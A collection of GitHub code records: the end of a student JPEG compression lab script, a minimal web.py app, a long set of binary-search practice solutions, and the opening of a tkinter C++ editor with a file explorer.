idct_on_each_block(r_img_y_8b_dct_qr)\nr_img_Cr_ds_8b_dct = idct_on_each_block(r_img_Cr_ds_8b_dct_qr)\nr_img_Cb_ds_8b_dct = idct_on_each_block(r_img_Cb_ds_8b_dct_qr)\n\n\n# 3'. Combine 8x8 blocks to original image\ndef combine_blocks_8(img_1ch_8b, original_shape):\n n_y_step = original_shape[0] // 8\n n_x_step = original_shape[1] // 8\n result = numpy.empty(shape=original_shape, dtype=numpy.uint8)\n result_idx = 0\n for y in range(n_y_step):\n for x in range(n_x_step):\n result[y * 8:(y + 1) * 8, x * 8:(x + 1) * 8] = img_1ch_8b[result_idx, :, :]\n result_idx += 1\n return result\n\n\nr_img_y_8blocks = combine_blocks_8(r_img_y_8b_dct, img_y.shape)\nr_img_Cr_ds_8blocks = combine_blocks_8(r_img_Cr_ds_8b_dct, img_Cr_downsample.shape)\nr_img_Cb_ds_8blocks = combine_blocks_8(r_img_Cb_ds_8b_dct, img_Cb_downsample.shape)\n\n\n# 2'. Upsampling on Cb Cr\ndef upsample(downs_img, ratio):\n ups_img = numpy.empty(shape=(downs_img.shape[0] * ratio, downs_img.shape[1] * ratio), dtype=numpy.uint8)\n for y in range(ups_img.shape[0]):\n for x in range(ups_img.shape[1]):\n ups_img[y][x] = downs_img[y // ratio][x // ratio]\n return ups_img\n\n\n# img_Cr_upsample = upsample(img_Cr_downsample, du_sample_ratio)\n# img_Cb_upsample = upsample(img_Cb_downsample, du_sample_ratio)\nr_img_Cr_up = upsample(r_img_Cr_ds_8blocks, du_sample_ratio)\nr_img_Cb_up = upsample(r_img_Cb_ds_8blocks, du_sample_ratio)\n\n# 1'. Convert YCbCr to RGB\nreconstructed_img_yCrCb = numpy.empty(shape=img_yCrCb.shape, dtype=numpy.uint8)\n# reconstructed_img_yCrCb[:, :, 0] = img_y\n# reconstructed_img_yCrCb[:, :, 1] = img_Cr_upsample\n# reconstructed_img_yCrCb[:, :, 2] = img_Cb_upsample\nreconstructed_img_yCrCb[:, :, 0] = r_img_y_8blocks\nreconstructed_img_yCrCb[:, :, 1] = r_img_Cr_up\nreconstructed_img_yCrCb[:, :, 2] = r_img_Cb_up\n\nreconstructed_img_bgr = cv.cvtColor(reconstructed_img_yCrCb, cv.COLOR_YCrCb2BGR)\n\n# 0'. 
Save the decoded image -- as PPM or PNG\ncv.imwrite('lab4-jpeg-result.png', reconstructed_img_bgr, [cv.IMWRITE_PNG_COMPRESSION, 9])\nlabel_after_compress = 'After compression'\ncv.namedWindow(label_after_compress, cv.WINDOW_NORMAL)\ncv.imshow(label_after_compress, reconstructed_img_bgr)\ncv.waitKey(0)\ncv.destroyAllWindows()\n\n# Note for task 4\n# No subsampling: size - 15589 B, no noticeable visual difference\n# Every 2nd pixel: size - 9224 B, no noticeable visual difference\n# Every 4th pixel: size - 7129 B, no noticeable visual difference\n# Every 64th pixel: size - 5311 B, the difference is hard to miss :)\n# In summary, the downsampling step significantly reduces the file size at an imperceptible loss of image quality\n# (assuming a small sampling step).\n# Sampling too sparsely does not bring a significant gain in disk usage, while it can strongly affect\n# the image quality.\n# A step of 4px seems to be a good choice (the loss is not yet visible).\n\n# Note for task 5\n# (sampling every 4 pixels)\n# QF = 99: size - 8719 B, no noticeable visual difference\n# QF = 95: size - 8681 B, no noticeable visual difference\n# QF = 50: size - 8320 B, vertical artifacts appeared, noticeable drop in quality\n# QF = 10: size - 7433 B, vertical artifacts appeared, clearly worse image quality\n# As the QF value decreases, the image size shrinks and its quality drops.\n# At high QF values (around 95) the quality loss is not noticeable at first glance; it is even\n# hard to spot a difference when analysing the image carefully.\n# Surprisingly, the image processed with the (simplified) JPEG algorithm is larger than the original.\n# This may be due to the specifics of this image - in this particular case the compression algorithm\n# happens to handle the unprocessed image better.\n","repo_name":"plonajakub/image-engineering","sub_path":"lab4/lab4-jpeg.py","file_name":"lab4-jpeg.py","file_ext":"py","file_size_in_byte":10509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22707691774","text":"import web\n\nurls = (\n '/', 'hello',\n '/bye/', 'bye')\n\napp = web.application(urls, globals(), True)\n\nrender = web.template.render('templates/')\n\nclass hello:\n def GET(self):\n return render.hello(\"Templates demo\", \"Hello\", \"A long time ago...\")\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"meghapanda/Indoor-Air-Quality","sub_path":"bin/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70717572843","text":"# https://www.codingninjas.com/studio/problems/binary-search_972?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\n#### Base of binary search\ndef search(nums: [int], target: int):\n # Write your code here.\n\n low = 0\n high = len(nums) - 1\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n\n return -1\n\n# https://www.canva.com/design/DADRwAjhxF0/Z21tg8BQ4Dyy5wGJclxWbA/edit?category=tACZCk6N0I4&utm_source=onboarding\ndef lowerBound(arr: [int], n: int, x: int) -> int:\n # Write your code here\n #### relation item >= x\n\n low = 0\n high = len(arr) - 1\n ans = len(arr)\n\n while low <= high:\n\n mid = (low + high) // 2\n 
# mid = low + (high - low) // 2\n\n if arr[mid] >= x:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n# https://www.codingninjas.com/studio/problems/implement-upper-bound_8165383?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef upperBound(arr: [int], x: int, n: int) -> int:\n # Write your code here\n #### relation item >= x\n\n low = 0\n high = len(arr) - 1\n ans = len(arr)\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] > x:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n# https://www.codingninjas.com/studio/problems/algorithm-to-find-best-insert-position-in-sorted-array_839813?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef searchInsert(arr: [int], m: int) -> int:\n # Write your code here\n #### relation item >= x\n\n low = 0\n high = len(arr) - 1\n ans = len(arr)\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] >= m:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n\ndef ceil(arr, x, n):\n\n low = 0\n high = n - 1\n ans = n\n\n while low <= high:\n\n mid = (low + high) //2\n\n if arr[mid] >= x:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n \n return ans \n\ndef floor(arr, x, n):\n\n low = 0\n high = n - 1\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[mid] <= x:\n ans = mid\n low = mid + 1\n else:\n high = mid - 1\n \n return ans \n\ndef ceilingInSortedArray(n, x, arr):\n\n arr.sort()\n\n floor_idx = floor(arr, x, n)\n ceil_idx = ceil(arr, x, n)\n \n a, b = [-1, n]\n\n if floor_idx != -1:\n a = arr[floor_idx]\n\n if ceil_idx != n:\n b = arr[ceil_idx]\n\n return ''.join(map( lambda x: str(x),[a, b]))\n\n\n# https://www.codingninjas.com/studio/problems/first-and-last-position-of-an-element-in-sorted-array_1082549?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef first_occur(arr: [int], n: int, x: int) -> int:\n # Write your code here\n #### relation item >= x\n\n low = 0\n high = len(arr) - 1\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] == x:\n ans = mid\n high = mid - 1\n elif arr[mid] > x:\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\ndef last_occur(arr: [int], n: int, x: int) -> int:\n # Write your code here\n #### relation item >= x\n\n low = 0\n high = n - 1\n ans = n \n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] == x:\n ans = mid\n low = mid + 1\n elif arr[mid] > x:\n high = mid - 1\n else:\n low = mid + 1\n\n return ans \n\ndef firstAndLastPosition(arr, n, k):\n\n ####first occurance is equal to lower_bound \n ####last occurance is equal to upper_bound - 1\n\n\n a = first_occur(arr, n , k)\n\n if a == -1:\n return -1, -1\n\n b = last_occur(arr, n, k)\n\n return a, b\n\n\ndef first_occur(arr: [int], n: int, x: int) -> int:\n\n low = 0\n high = len(arr) - 1\n ans = 0\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] == x:\n ans = mid\n high = mid - 1\n elif arr[mid] > x:\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\ndef last_occur(arr: [int], n: int, x: int) -> int:\n\n low = 0\n high = n - 1\n ans = 0\n\n while low <= high:\n\n mid = (low + high) // 2\n # mid = low + (high - low) // 2\n\n if arr[mid] == x:\n ans = mid\n low = mid + 1\n elif arr[mid] > x:\n high = mid - 1\n 
else:\n low = mid + 1\n\n return ans\n\n\ndef count(arr: [int], n: int, x: int) -> int:\n # Your code goes here\n\n last_idx = last_occur(arr, n , x)\n first_idx = first_occur(arr, n, x)\n\n if last_idx == first_idx == 0:\n return 0\n\n return last_idx - first_idx + 1\n\n\n\ndef binary_search(arr, n, x):\n\n low = 0\n high = n - 1\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[mid] == x:\n return mid\n \n elif arr[mid] > x:\n high = mid - 1\n \n else:\n low = mid + 1\n\n\n return ans\n\n\n\ndef count(arr: [int], n: int, x: int) -> int:\n # Your code goes here\n\n idx = binary_search(arr, n , x)\n\n if idx == -1: return 0\n\n # print(idx)\n\n ###searching in left side\n ans = 1\n\n left = idx - 1\n\n while left >= 0 and arr[left] == x:\n ans += 1\n left -= 1\n\n ### searching in right side\n right = idx + 1\n\n while right < n and arr[right] == x:\n ans += 1\n right += 1\n\n return ans\n\n\n# https://www.codingninjas.com/studio/problems/search-in-rotated-sorted-array_1082554?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef search_rotated_array_1(arr, n, k):\n\t\n\tlow = 0\n\thigh = n - 1\n\n\twhile low <= high:\n\n\t\tmid = (low + high) // 2\n\n\t\tif arr[mid] == k:\n\t\t\treturn mid \n\t\t\n\t\t###find the sorted part \n\t\t\n\t\tif arr[low] <= arr[mid]:\n\t\t\t###fist part is sorted\n\n\t\t\t### now check if k in present in this range\n\t\t\tif arr[low] <= k <= arr[mid]:\n\t\t\t\thigh = mid - 1\n\t\t\telse:\n\t\t\t\tlow = mid + 1\n\t\telse:\n\t\t\t### second part is sorted\n\n\t\t\tif arr[mid] <= k <= arr[high]:\n\t\t\t\tlow = mid + 1\n\t\t\telse:\n\t\t\t\thigh = mid - 1\n\t\t\t\n\t\n\treturn -1\n\n# https://www.codingninjas.com/studio/problems/search-in-a-rotated-sorted-array-ii_7449547?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef searchInARotatedSortedArrayII(A : List[int], key : int) -> bool:\n \n low = 0\n high = len(A) - 1\n\n while low <= high:\n\n mid = low + (high - low) // 2\n\n if A[mid] == key:\n return True\n\n ### to handle duplicates \n if A[mid] == A[low] == A[high]:\n low += 1 \n high -= 1\n continue\n\n ####find the sorted half\n if A[low] <= A[mid]: ### fisrt part is sorted\n\n if A[low] <= key <= A[mid]:\n high = mid - 1\n else:\n low = mid + 1\n else:\n\n if A[mid] <= key <= A[high]:\n low = mid + 1\n else:\n high = mid - 1\n\n return False\n\n# https://www.codingninjas.com/studio/problems/rotated-array_1093219?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef findMin(arr: [int]):\n\n n = len(arr)\n low = 0\n high = n - 1\n mini = float('inf')\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[low] <= arr[mid]:\n mini = min(mini, arr[low])\n low = mid + 1\n else:\n mini = min(mini, arr[mid])\n high = mid - 1\n\n return mini\n\n# https://www.codingninjas.com/studio/problems/rotation_7449070?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=1\ndef findMin(arr: [int]):\n\n n = len(arr)\n low = 0\n high = n - 1\n mini = float('inf')\n idx = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[low] <= arr[mid]:\n # mini = min(mini, arr[low])\n if mini > arr[low]:\n mini = arr[low]\n idx = low\n\n low = mid + 1\n else:\n # mini = min(mini, arr[mid])\n if mini > arr[mid]:\n mini = arr[mid]\n idx = mid\n\n high = mid - 1\n\n return idx\n\ndef findKRotation(arr : [int]) -> int:\n\n return findMin(arr)\n\n# 
https://www.codingninjas.com/studio/problems/unique-element-in-sorted-array_1112654?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef singleNonDuplicate(arr):\n \n ### not considering the 0th and nth index \n ### rule arr[i] != arr[i-1] or arr[i] != arr[i+1] this is the single number.\n ### elimination rule:\n ### using odd, even pos\n ### before the single number (ans), we will follow the (even, odd) trend.\n ### after the single number (ans), we will follow the (odd, even) trend. \n\n ### if it only has one element\n if len(arr) == 1: return arr[0]\n\n ### handling it 0th and nth case. \n if arr[0] != arr[1]: return arr[0]\n\n n = len(arr)\n\n if arr[n-1] != arr[n-2]: return arr[n-1]\n\n low = 1\n high = n - 2\n\n while low <= high:\n\n mid = (low + high) // 2\n\n ##check if single number\n if arr[mid] != arr[mid + 1] and arr[mid] != arr[mid - 1]:\n return arr[mid]\n ##if we are in left half we eliminate it\n ##left half follows the order even, odd\n if (mid % 2 == 0 and arr[mid] == arr[mid + 1]) or (mid % 2 != 0 and arr[mid] == arr[mid-1]):\n ## in the left half\n low = mid + 1\n else:\n ### else I am in right half\n high = mid - 1\n\n return -1\n\n\n# https://www.codingninjas.com/studio/problems/find-peak-element_1081482?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef findPeakElement(arr: [int]) -> int:\n ####similar to single number\n\n ###peak number condition arr[i] > arr[i + 1] and arr[i] > arr[i - 1]\n n = len(arr)\n\n ### handle edge cases\n ### case 1: only one element\n if n == 1: return 0\n\n ### case 2: 0th index is a peak element\n if arr[0] > arr[1]: return 0\n\n ### case 3: nth index is a peak element\n if arr[n-1] > arr[n-2]: return n-1\n\n low = 1\n high = n - 2\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[mid] > arr[mid-1] and arr[mid] > arr[mid+1]:\n return mid\n\n ###check if your at the descending or the ascending part.\n if arr[mid] > arr[mid-1]:\n ###in the descending part\n low = mid + 1\n else:\n ### in the ascending part\n high = mid - 1\n\n return -1\n\n# https://www.codingninjas.com/studio/problems/square-root-integral_893351?leftPanelTab=1&utm_medium=website&utm_campaign=a_zcoursetuf\ndef floorSqrt(n):\n # write your code logic here .\n low = 1\n high = n\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if mid*mid <= n:\n ans = mid\n low = mid + 1\n else:\n high = mid - 1\n\n return ans\n\n# manual test for floorSqrt (uncomment to run interactively; kept commented so the module does not block on input())\n# n = int(input())\n# print(floorSqrt(n))\n\n# https://www.codingninjas.com/studio/problems/nth-root-of-m_1062679?utm_source=striver&utm_medium=website&utm_campaign=codestudio_a_zcourse&leftPanelTab=0\n###brute force approach for python\ndef NthRoot(n: int, m: int) -> int:\n ### range should go from 1 to n\n\n for i in range(1, m):\n\n val = i ** n\n\n if val == m:\n return i\n elif val > m:\n return -1\n\ndef NthRoot(n: int, m: int) -> int:\n ### range should go from 1 to n\n \n # for i in range(1, m):\n\n # val = i ** n \n \n # if val == m:\n # return i\n # elif val > m:\n # return -1\n\n\n low = 1\n high = m\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = mid ** n\n\n if val == m:\n return mid\n elif val > m:\n high = mid - 1\n else:\n low = mid + 1\n\n return -1\n\n\n# https://www.codingninjas.com/studio/problems/minimum-rate-to-eat-bananas_7449064?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\nimport math\ndef total_hours(a, m):\n\n total_time = 0\n\n for i in a:\n if i <= m:\n total_time += 1\n else:\n total_time += 
int(math.ceil(i/m))\n \n return total_time\n\n# ###brute force apporach\n# def minimumRateToEatBananas(v: [int], h: int) -> int:\n \n\n# for m in range(1, max(v)+1):\n\n# t = total_hours(v, m)\n\n# if t <= h:\n# return m\n\n\ndef minimumRateToEatBananas(v: [int], h: int) -> int:\n \n\n low = 1\n high = max(v)\n ans = high\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if total_hours(v, mid) <= h:\n ans = mid \n high = mid - 1\n else:\n low = mid + 1\n \n return ans\n\n\n\n\nfrom typing import List\n\n# def total_bouquets(arr, k, days, m):\n\n# total = 0\n# curr = 0\n\n# for i in arr:\n \n# if i <= days:\n# curr += 1\n# else:\n# curr = 0\n\n# if curr == k:\n# total += 1\n# curr = 0\n\n# if total == m:\n# return True\n\n# return False\n\n\n# https://www.codingninjas.com/studio/problems/rose-garden_2248080?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef total_bouquets(arr, k, days, m):\n\n total = 0\n curr = 0\n\n for i in arr:\n\n if i <= days:\n curr += 1\n else:\n curr = 0\n\n if curr == k:\n total += 1\n curr = 0\n if total == m:\n return total\n\n return total\n\ndef roseGarden(arr: List[int], k: int, m: int):\n\n # for days in range(1, max(arr) + 1):\n\n # if total_bouquets(arr, k, days, m):\n # return days\n\n low = 1\n high = max(arr)\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n # print(mid)\n\n val = total_bouquets(arr, k, mid, m)\n\n if val >= m:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n# https://www.codingninjas.com/studio/problems/smallest-divisor-with-the-given-limit_1755882?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\nfrom os import *\nfrom sys import *\nfrom collections import *\nfrom math import *\n\ndef calculate_sum(arr, divisor):\n\n ans = 0\n for i in arr:\n ans += ceil(i/divisor)\n return int(ans)\n\ndef smallestDivisor(arr: [int], limit: int) -> int:\n \n \n # for i in range(1, max(arr) + 1):\n\n # val = calculate_sum(arr, i)\n\n # if val <= limit:\n # return i\n\n # return -1\n\n low = 1\n high = max(arr)\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = calculate_sum(arr, mid)\n\n if val <= limit:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n\n return ans\n\n\n# https://www.codingninjas.com/studio/problems/capacity-to-ship-packages-within-d-days_1229379?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\n\nfrom os import *\nfrom sys import *\nfrom collections import *\nfrom math import *\n\ndef calculate_time(weights, cap):\n\n load = 0\n days = 1\n\n for i in weights:\n if load + i > cap:\n days += 1\n load = i\n else:\n ##can load/take the package on the same day.\n load += i\n\n return days\n\ndef leastWeightCapacity(weights, d):\n \n # for cap in range(max(weights), sum(weights) + 1):\n\n # days = calculate_time(weights, cap)\n\n # # print(days, cap)\n\n # if days <= d:\n # return cap\n \n # return -1\n\n low = max(weights)\n high = sum(weights)\n ans = -1\n\n while low <= high:\n\n #possiable capacity \n mid = (low + high) // 2\n\n days = calculate_time(weights, mid)\n\n if days <= d:\n ans = mid\n high = mid - 1\n else:\n low = mid + 1\n \n return ans\n\n\n# https://www.codingninjas.com/studio/problems/kth-missing-element_893215?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\n\nfrom typing import *\n\ndef missingK(vec: List[int], n: int, k: int) -> int:\n # Write your code here.\n \n ### TC: O(N)\n ### SC: O(N) becz of the set.\n\n # vec = 
set(vec)\n\n # for i in range(1, max(vec) + 1):\n\n # if i not in vec:\n # k -= 1\n\n # if k == 0:\n # return i \n\n # return -1\n\n ###binary search in applied on the index\n\n low = 0\n high = n-1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n missing = vec[mid] - mid - 1\n\n if missing < k:\n low = mid + 1\n else:\n high = mid - 1\n\n return k + high + 1\n\n\n# https://www.codingninjas.com/studio/problems/aggressive-cows_1082559?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\ndef can_place(stalls, k, dist):\n\n last = stalls[0]\n count = 1\n\n for curr in stalls[1:]:\n\n if curr - last >= dist:\n count += 1\n last = curr\n\n if count >= k:\n return True\n\n return False \n\n\ndef aggressiveCows(stalls, k):\n\n stalls.sort()\n\n min_range = 1\n max_range = max(stalls) - min(stalls)\n\n # for dist in range(min_range, max_range+1):\n\n # ###check if its possiable to place k cows in stalls given dist \n # if not can_place(stalls, k, dist):\n # return dist - 1\n \n # return max_range \n\n low = min_range\n high = max_range \n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = can_place(stalls, k, mid)\n\n ###if true then this is a possiable answer \n if val:\n ans = max(mid, ans)\n low = mid + 1\n else:\n high = mid - 1\n \n return ans\n\n\n# https://www.codingninjas.com/studio/problems/allocate-books_1090540?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=1\ndef countStudents(arr, pages):\n n = len(arr) # size of array\n students = 1\n pagesStudent = 0\n for i in range(n):\n if pagesStudent + arr[i] <= pages:\n # add pages to current student\n pagesStudent += arr[i]\n else:\n # add pages to next student\n students += 1\n pagesStudent = arr[i]\n return students\n\ndef findPages(arr, n, m):\n # book allocation impossible\n if m > n:\n return -1\n\n low = max(arr)\n high = sum(arr)\n\n # for pages in range(low, high + 1):\n # if countStudents(arr, pages) == m:\n # return pages\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = countStudents(arr, mid)\n\n\n if val > m:\n low = mid + 1\n else:\n high = mid - 1\n\n return low\n\n# https://www.codingninjas.com/studio/problems/largest-subarray-sum-minimized_7461751?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=1\ndef split_array(a, k, limit):\n\n prev = 0\n splits = 1\n\n for i in a:\n\n if i + prev <= limit:\n prev += i\n else:\n ###split\n splits += 1\n prev = i\n\n return splits\n\ndef largestSubarraySumMinimized(a: [int], k: int) -> int:\n\n\n low = max(a)\n high = sum(a)\n\n # for i in range(low, high+1):\n\n # if split_array(a, k, i) == k:\n # return i\n\n while low <= high:\n\n mid = (low + high) // 2\n\n val = split_array(a, k, mid)\n\n if val > k:\n low = mid + 1\n else:\n high = mid - 1\n\n return low\n\n# https://www.codingninjas.com/studio/problems/painter-s-partition-problem_1089557?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=1\ndef painters_requied(boards, max_load):\n\n painters = 1\n load = 0\n\n for i in boards:\n\n if i + load <= max_load:\n load += i\n else:\n ###move to next painter\n painters += 1\n load = i\n\n return painters\n\n\ndef findLargestMinDistance(boards:list, k:int):\n \n low_limit = max(boards)\n max_limit = sum(boards)\n\n # for max_load in range(low_limit, max_limit):\n\n # val = painters_requied(boards, max_load)\n\n # if val <= k:\n # return max_load\n \n # return max_limit ##if k == 1\n\n \n low = low_limit\n high = max_limit\n\n while low <= 
high:\n\n mid = (low + high) // 2\n\n val = painters_requied(boards, mid)\n\n if val > k:\n low = mid + 1\n else:\n high = mid - 1\n\n return low\n\n\ndef binary_search(arr, target):\n\n low = 0\n high = len(arr) - 1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[mid] == target:\n return mid \n elif arr[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n \n return -1\n\ndef searchMatrix(mat: [[int]], target: int) -> bool:\n # Write your code here.\n ### TC: O(N * log(M))\n ### SC: (1)\n # for col_arr in mat:\n\n # if col_arr[0] <= target <= col_arr[-1]:\n # ###do search\n # val = binary_search(col_arr, target) \n\n # if val != -1:\n # return True \n \n # return False\n\n ###approach\n\n n = len(mat)\n m = len(mat[0])\n\n low = 0\n high = (m * n) - 1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n ###need to get row index and col index \n col = mid % m\n row = mid // m\n \n if mat[row][col] == target:\n return True \n elif mat[row][col] > target:\n high = mid - 1\n else:\n low = mid + 1\n \n return False\n\n\n# https://www.codingninjas.com/studio/problems/median-of-a-row-wise-sorted-matrix_1115473?utm_source=striver&utm_medium=website&utm_campaign=a_zcoursetuf&leftPanelTab=0\n\ndef lower_then(arr, x):\n\n low = 0\n high = len(arr) -1\n ans = -1\n\n while low <= high:\n\n mid = (low + high) // 2\n\n if arr[mid] <= x:\n ans = mid\n low = mid + 1\n else:\n high = mid - 1\n \n \n return ans + 1\n\n\ndef median(matrix: [[int]], m: int, n: int) -> int:\n \n ###brute force \n ### TC: O(NXM * log(N*M))\n ### SC: O(NXM)\n\n ### x is mxn\n # ls = [] #O(x)\n \n # ###O(x)\n # for i in matrix:\n # ls.extend(i)\n \n # ls.sort() ##xlogx\n\n # return ls[m*n//2]\n \n ####binary search \n # low = min([matrix[i][0] for i in range(n)])\n # high = max([matrix[i][m-1] for i in range(n)])\n\n n = len(matrix)\n m = len(matrix[0])\n\n low = 1\n high = 10 ** 9\n median_index = (n * m) // 2\n\n while low <= high:\n\n mid = (low + high) // 2\n\n ###count the number of elements <= mid\n ###get all elements <= mid \n cnt = 0\n for i in range(n):\n cnt += lower_then(matrix[i], mid)\n\n if cnt <= median_index:\n low = mid + 1\n else:\n high = mid - 1\n\n return low\n\n","repo_name":"evilc3/dsa","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":23616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17822821318","text":"# Add \"C:\\MinGW\\bin\" to path\n\nfrom tkinter.filedialog import askdirectory\nfrom tkinter import messagebox\nimport tkinter as tk\nimport pickle\n\nfrom constants.settings import settings, ChangeSettings\nfrom runnable.runnable import RunnableText\nfrom constants.bettertk import BetterTk, BetterTkSettings\nfrom constants.cpptext import CPPText\nfrom constants.notebook import Notebook\nfrom file_explorer import Explorer\n\n\nSAMPLE_CODE = \"\"\"\n#include \n\nusing namespace std;\n\nint main(){\n cout << \"Hello World\\\\n\";\n return 0; // this is a comment\n}\n\"\"\"[1:-1]\n\n\nFONT = settings.editor.font.get()\nHEIGHT = settings.editor.height.get()\nWIDTH = settings.editor.width.get()\nBG_COLOUR = settings.editor.bg.get()\nFG_COLOUR = settings.editor.fg.get()\nTITLEBAR_COLOUR = settings.editor.titlebar_colour.get()\nINACTIVETITLE_BG = settings.editor.inactivetitle_bg.get()\n\n\nclass App:\n def __init__(self):\n settings = BetterTkSettings(theme=\"dark\")\n settings.config(active_titlebar_bg=BG_COLOUR, bg=BG_COLOUR,\n active_titlebar_fg=TITLEBAR_COLOUR,\n 
separator_colour=FG_COLOUR,\n inactive_titlebar_bg=INACTIVETITLE_BG)\n self.root = BetterTk(settings=settings)\n self.root.iconbitmap(\"sprites/logo/logo1.ico\")\n self.root.bind_all(\"\", self.change_settings)\n self.root.title(\"Bismuth 184\")\n self.root.close_button.config(command=self.close_app)\n\n pannedwindow = tk.PanedWindow(self.root, sashwidth=4,\n orient=\"horizontal\")\n pannedwindow.pack(fill=\"both\", expand=True)\n\n self.explorer_window = tk.Frame(pannedwindow, bd=0,\n highlightthickness=0)\n # self.explorer_window.pack(fill=\"both\", expand=True, side=\"left\")\n\n self.explorer = Explorer(self.explorer_window, width=200,\n height=2600)\n self.explorer.pack(fill=\"both\", expand=True, side=\"bottom\")\n self.explorer.resize(\"fit_width\")\n self.explorer.bind_all(\"<>\", self.open_file_explorer)\n\n self.explorer_buttons_frame = tk.Frame(self.explorer_window, bd=0,\n highlightthickness=0)\n self.explorer_buttons_frame.pack(fill=\"x\", side=\"top\")\n self.populate_explorer_buttons()\n\n self.notebook = Notebook(pannedwindow)\n pannedwindow.add(self.explorer_window, sticky=\"news\")\n pannedwindow.add(self.notebook, sticky=\"news\", width=780, height=690)\n # self.notebook.pack(fill=\"both\", expand=True, side=\"right\")\n self.tabs = {}\n\n self.notebook._delete_tab = self.close_tab\n self.notebook._plus_pressed = self.add_tab\n self.notebook._set_active = self.set_active_tab\n\n try:\n with open(\"state.state\", \"rb\") as file:\n state = pickle.loads(file.read())\n self.open_app(state)\n except FileNotFoundError:\n self.add_tab()\n\n def open_file_explorer(self, event):\n file = event.widget.item\n idx = self.add_tab()\n wrapper = self.tabs[idx][1]\n wrapper._open(file.full_path)\n wrapper.text.update_idletasks()\n wrapper.text.after(500, wrapper.text.see_insert)\n\n def add_folder_explorer(self):\n full_path = askdirectory(master=self.root)\n # Check if user canceled\n if len(full_path) > 0:\n self.explorer.add(full_path)\n\n def remove_folder_explorer(self):\n selected = self.explorer.explorer.selected\n if selected is not None:\n if selected in self.explorer.explorer.tree.children:\n self.explorer.explorer.remove(selected)\n self.explorer.select(None)\n\n def populate_explorer_buttons(self):\n b1 = tk.Button(self.explorer_buttons_frame, bg=BG_COLOUR, fg=FG_COLOUR,\n command=self.add_folder_explorer, text=\"Add folder\")\n b2 = tk.Button(self.explorer_buttons_frame, bg=BG_COLOUR,\n fg=FG_COLOUR, command=self.remove_folder_explorer,\n text=\"Remove folder\")\n b1.pack(fill=\"x\", expand=True, side=\"left\")\n b2.pack(fill=\"x\", expand=True, side=\"left\")\n\n def set_active_tab(self, idx):\n try:\n self.tabs[idx][0].focus()\n self.notebook.set_active(idx)\n except KeyError:\n pass\n\n def ask_close_tab(self, idx, event=None):\n text_widget, text_widget_wrapper = self.tabs[idx]\n if not text_widget_wrapper.is_saved():\n filename = text_widget_wrapper.file_name\n msg = 